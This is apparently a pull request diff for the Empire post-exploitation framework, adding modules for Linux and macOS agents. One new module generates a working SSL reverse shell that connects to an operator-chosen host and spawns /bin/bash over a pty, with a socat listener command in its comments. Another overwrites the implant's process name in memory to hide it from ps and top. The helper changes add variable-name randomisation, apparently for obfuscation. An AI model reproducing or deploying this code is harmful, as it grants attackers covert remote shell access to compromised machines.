### PR TITLE
Module additions for *nix agents

### DIFF
--- a/lib/common/helpers.py
+++ b/lib/common/helpers.py
@@ -52,11 +52,24 @@ import threading
 import pickle
 import netifaces
 import random
-from datetime import datetime
+
 import subprocess
 import fnmatch
 import urllib, urllib2
+import hashlib
+import datetime
+import uuid
+import ipaddress
+from datetime import datetime
 
+###############################################################
+#
+# Global Variables
+#
+################################################################
+
+globentropy=random.randint(1,datetime.today().day)
+globDebug=False
 ###############################################################
 #
 # Validation methods
@@ -142,6 +155,13 @@ def random_string(length=-1, charset=string.ascii_letters):
     random_string = ''.join(random.choice(charset) for x in range(length))
     return random_string
 
+
+def generate_random_script_var_name(origvariname,globDebug=False):
+    if globDebug:
+	    return origvariname
+    else:
+	    hash_object=hashlib.sha1(str(origvariname)+str(globentropy)).hexdigest()
+    return hash_object[:-datetime.today().day]
 
 def randomize_capitalization(data):
     """
@@ -679,6 +699,8 @@ def color(string, color=None):
             attr.append('31')
         elif color.lower() == "green":
             attr.append('32')
+        elif color.lower() == "yellow":
+            attr.append('33')
         elif color.lower() == "blue":
             attr.append('34')
         return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
@@ -696,6 +718,20 @@ def color(string, color=None):
         else:
             return string
 
+def lastseen(stamp, delay, jitter):
+    """
+    Colorize the Last Seen field based on measured delays
+    """
+    try:
+        delta = datetime.now() - datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")
+        if delta.seconds > delay * (jitter + 1) * 5:
+            return color(stamp, "red")
+        elif delta.seconds > delay * (jitter + 1):
+            return color(stamp, "yellow")
+        else:
+            return color(stamp, "green")
+    except Exception:
+        return stamp
 
 def unique(seq, idfun=None):
     """

--- a/lib/common/messages.py
+++ b/lib/common/messages.py
@@ -171,12 +171,14 @@ def display_agents(agents):
     Take a dictionary of agents and build the display for the main menu.
     """
 
+    rowToggle = 0
+
     if len(agents) > 0:
 
         print ''
         print helpers.color("[*] Active agents:\n")
-        print "  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen"
-        print "  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------"
+        print " Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen"
+        print " ----     -- -----------     ------------      --------                -------            ---    -----    ---------"
 
         for agent in agents:
 
@@ -192,8 +194,20 @@ def display_agents(agents):
             else:
                 agent['language'] = 'X'
 
-            print "  %.16s%.6s%.16s%.16s%.20s%.20s%.9s%.20s" % ('{0: <16}'.format(agent['name']), '{0: <6}'.format(agent['language']), '{0: <16}'.format(agent['internal_ip']), '{0: <16}'.format(agent['hostname']), '{0: <20}'.format(agent['username']), '{0: <20}'.format(str(agent['process_name']) + "/" + str(agent['process_id'])), '{0: <9}'.format(str(agent['delay']) + "/"  +str(agent['jitter'])), agent['lastseen_time'])
+            print " %.8s %.2s %.15s %.17s %.23s %.18s %.6s %.8s %.30s" % ('{0: <8}'.format(agent['name']),
+                                  '{0: <2}'.format(agent['language']),
+                                  '{0: <15}'.format(str(agent['internal_ip']).split(" ")[0]),
+                                  '{0: <17}'.format(agent['hostname']),
+                                  '{0: <23}'.format(agent['username']),
+                                  '{0: <18}'.format(agent['process_name']),
+                                  '{0: <6}'.format(str(agent['process_id'])),
+                                  '{0: <8}'.format(str(agent['delay']) + "/"  +str(agent['jitter'])),
+                                  str(helpers.lastseen(agent['lastseen_time'], agent['delay'], agent['jitter'])))
 
+            # Skip rows for better readability
+            rowToggle = (rowToggle + 1) % 3
+            if rowToggle == 0:
+                print
         print ''
     else:
         print helpers.color('[!] No agents currently registered')

--- a/lib/modules/python/management/multi/change_process_name.py
+++ b/lib/modules/python/management/multi/change_process_name.py
@@ -1,0 +1,95 @@
+from lib.common import helpers
+import pdb
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Change Process Name',
+
+            # list of one or more authors for the module
+            'Author': ['calmhavoc','FleiXius'],
+
+            # more verbose multi-line description of the module
+            'Description': ("Overwrites process name in memory which changes the process name when viewed with tools such as ps and top"),
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : True,
+
+            # the module language
+            'Language' : 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion' : '2.6',
+
+            # list of any references/other comments
+            'Comments': []
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            'Agent' : {
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'ProcessName' : {
+                'Description'   :   'New process name for the current implant; 15 character max',
+                'Required'      :   True,
+                'Value'         :   '/usr/bin/python'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+        processName = self.options['ProcessName']['Value']
+        script = """
+import ctypes
+from ctypes.util import find_library
+libc = ctypes.CDLL(find_library('c'))
+name = '%s'
+argv = ctypes.POINTER(ctypes.POINTER(ctypes.c_char))()
+argc = ctypes.c_int()
+ctypes.pythonapi.Py_GetArgcArgv(ctypes.byref(argc), ctypes.byref(argv))
+memset = libc.memset
+memset.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_size_t]
+memset.restype = ctypes.c_void_p
+strlen = libc.strlen
+strlen.argtypes = [ctypes.c_void_p]
+strlen.restype = ctypes.c_size_t
+libc.strncpy(argv[0], name, len(name))
+for x in xrange(1, int(argc.value)):
+  libc.strncpy(argv[x], ' ' * strlen(argv[x]), strlen(argv[x]))
+new_name = ctypes.addressof(argv[0].contents) + len(name)
+libc.memset(new_name, 0, strlen(new_name))
+libc.prctl(15, ctypes.c_char_p(name), 0, 0, 0)
+""" % (processName)
+
+
+        return script

--- a/lib/modules/python/management/multi/spawn_tty_shell.py
+++ b/lib/modules/python/management/multi/spawn_tty_shell.py
@@ -1,0 +1,106 @@
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'TTY Shell Spawn',
+
+            # list of one or more authors for the module
+            'Author': ['calmhavoc'],
+
+            # more verbose multi-line description of the module
+            'Description': ('Spawns a reverse shell with TTY support over HTTPS'),
+
+            # True if the module needs to run in the background
+            'Background' : True,
+
+            # File extension to save the file as
+            'OutputExtension' : '',
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : True,
+
+            # the module language
+            'Language' : 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion' : '2.6',
+
+            # list of any references/other comments
+            'Comments': ['Listen with: socat `tty`,raw,echo=0 openssl-listen:443,reuseaddr,cert=cert.pem,verify=0' ]
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Host' : {
+                'Description'   :   'Listening HTTPS Host; eg host running: socat `tty`,raw,echo=0 openssl-listen:443,reuseaddr,cert=cert.pem,verify=0',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Port' : {
+                'Description'   :   'Target port , 443 is default.',
+                'Required'      :   True,
+                'Value'         :   '443'
+            }
+                    }
+
+        self.mainMenu = mainMenu
+
+        if params:
+            for param in params:
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+        host = self.options['Host']['Value']
+        port = self.options['Port']['Value']
+
+        script = """
+import socket,sys,subprocess,os
+import pty
+import ssl
+import select
+
+
+def main(host,port):
+    ADDRESS = (host, int(port))
+    sslSock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM), ssl_version=ssl.PROTOCOL_SSLv23)
+    sslSock.connect(ADDRESS)
+    master, slave = pty.openpty()
+    myterm = subprocess.Popen(["/bin/bash"],preexec_fn=os.setsid,stdin=slave, stdout=slave, stderr=slave,
+                            universal_newlines=True)
+
+    try:
+        while myterm.poll() is None:  
+            rlist, wlist, xlist = select.select([sslSock, master], [], [])  
+            if sslSock in rlist:
+                try:
+                    data = sslSock.recv(1024)
+                except Exception as e:
+                    print str(e)
+                if not data:break
+                while sslSock.pending():
+                    data += sslSock.recv(sslSock.pending())
+                os.write(master, data)
+            elif master in rlist:  
+                sslSock.write(os.read(master, 1024))
+    finally:
+        sslSock.close()
+
+main("%s","%s")
+""" % (host,port)
+        return script

--- a/lib/stagers/osx/macho.py
+++ b/lib/stagers/osx/macho.py
@@ -77,7 +77,6 @@ class Stager:
             return ""
 
         else:
-
-            launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
+            #launcher = launcher.strip('echo')
             macho = self.mainMenu.stagers.generate_macho(launcher)
             return macho


### PR DESCRIPTION
Added two modules for *nix based targets. One spawns an SSL encrypted TTY shell to a remote listener and the other enables arbitrary renaming of the Empire process (/usr/bin/python) to anything within a 15 character limit.